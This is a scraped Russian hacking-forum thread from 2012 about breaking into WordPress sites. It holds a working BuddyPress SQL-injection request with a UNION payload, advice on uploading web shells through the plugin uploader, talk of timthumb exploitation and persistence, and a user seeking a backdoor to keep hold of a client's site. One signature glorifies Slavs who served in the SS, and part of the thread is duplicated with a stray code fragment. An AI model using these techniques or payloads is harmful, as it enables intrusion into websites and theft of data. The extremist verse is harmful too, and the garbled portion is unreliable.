ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

16.04.2012, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 2714
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
PHP интерпретатор нужен. Самое легкое, скачай Denwer и запускай.
благодарю
|
|
|
|

16.04.2012, 18:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 2714
Репутация:
0
|
|
Подскажите, что я должен делать дальше? Что это мне даст
|
|
|
|

16.04.2012, 18:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Это тебе дает раскрытие путей, что позволяет узнать путь сервера , которые нужен в различных вариантов развития событий, но в твоем случае думаю ничего не дает
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

16.04.2012, 21:00
|
|
Новичок
Регистрация: 19.11.2009
Сообщений: 2
Провел на форуме: 10647
Репутация:
0
|
|
Сообщение от morgan-id
morgan-id said:
подскажите , хостинг стоит на CPanel движок WordPress доступ есть полный и на хостинг админом и в админ панель WordPress
что можно сделать или какой шелл залить что бы я всегда имел доступ и знал пароль в случае его смены ?
проблема не оплаты за работу создания сайта , доступ пока у меня есть ко всему абсолютно но думаю скоро сменят пароли
за советы буду благодарен !
пароль если сменят, ты получишь тока хэш его, он хранится в бд не в открытом виде.
создай юзверя к БД с правами ещё одного... по поводу шелла хз, другие мб тебе подскажут, я таким не занимаюсь
|
|
|

17.04.2012, 23:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 2714
Репутация:
0
|
|
Народ, есть что-нибудь на 2.9.2 версию?
Через _tp://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts смогу к sql подобраться? Расскажите как сайт на 2.9.2 вскрыть, пожалуйста.
|
|
|
|

17.04.2012, 23:51
|
|
Новичок
Регистрация: 22.02.2010
Сообщений: 5
Провел на форуме: 27699
Репутация:
2
|
|
Сообщение от None
W.X.Y.Z = Malicious User's MySQL Instance
имя юзера или что?
пройдут запросы с livehttpheader?
|
|
|

24.04.2012, 20:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 756
Репутация:
0
|
|
Код:
Code:
# Exploit Title: Buddypress plugin of Wordpress remote SQL Injection
# Date: March 31, 2012
# Author: Ivan Terkin
# Exploitation: Remote Exploit
# Bug: Remote SQL Injection
# Software Link: buddypress.org
# Version: till 1.5.5
# Tested on: Buddypress 1.5.4
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
Reported to developers and fixed in version 1.5.5
|
|
|
|

26.04.2012, 11:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Есть wordpress-сайт с уязвимым timthumb.php. Эксплоит отрабатывает, в директории "cache" создается файлик external_[хэш].php. Теперь не понятно, как народ закрепляется, фрэймит итд? если у скрипта external_[хэш].php прав на запись в директории и файло нехватет?
Спасибо
|
|
|
|

26.04.2012, 16:02
|
|
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме: 1031617
Репутация:
128
|
|
столкнулся с невозможностью правки php файлов themes.
идем в Plugin
update.php?action=upload-plugin , там нет ограничений на расширения. туда заливаем наш шелл. идем в Media и видим его там.
|
|
|

26.04.2012, 18:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от sqonf
sqonf said:
Есть wordpress-сайт с уязвимым timthumb.php. Эксплоит отрабатывает, в директории "cache" создается файлик external_[хэш].php. Теперь не понятно, как народ закрепляется, фрэймит итд? если у скрипта external_[хэш].php прав на запись в директории и файло нехватет?
Спасибо
Сообщение от Radiator
Radiator said:
столкнулся с невозможностью правки php файлов themes.
идем в Plugin
update.php?action=upload-plugin , там нет ограничений на расширения. туда заливаем наш шелл. идем в Media и видим его там.
" if author else f"
sqonf said:
Есть wordpress-сайт с уязвимым timthumb.php. Эксплоит отрабатывает, в директории "cache" создается файлик external_[хэш].php. Теперь не понятно, как народ закрепляется, фрэймит итд? если у скрипта external_[хэш].php прав на запись в директории и файло нехватет?
Спасибо
Сообщение от Radiator
Radiator said:
столкнулся с невозможностью правки php файлов themes.
идем в Plugin
update.php?action=upload-plugin , там нет ограничений на расширения. туда заливаем наш шелл. идем в Media и видим его там.
К сожалению у меня для этого нет админки. Шелл я и так могу залить, не проблема. Проблема в том, что для закрепления нет прав для записи в каталогах и файлах.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|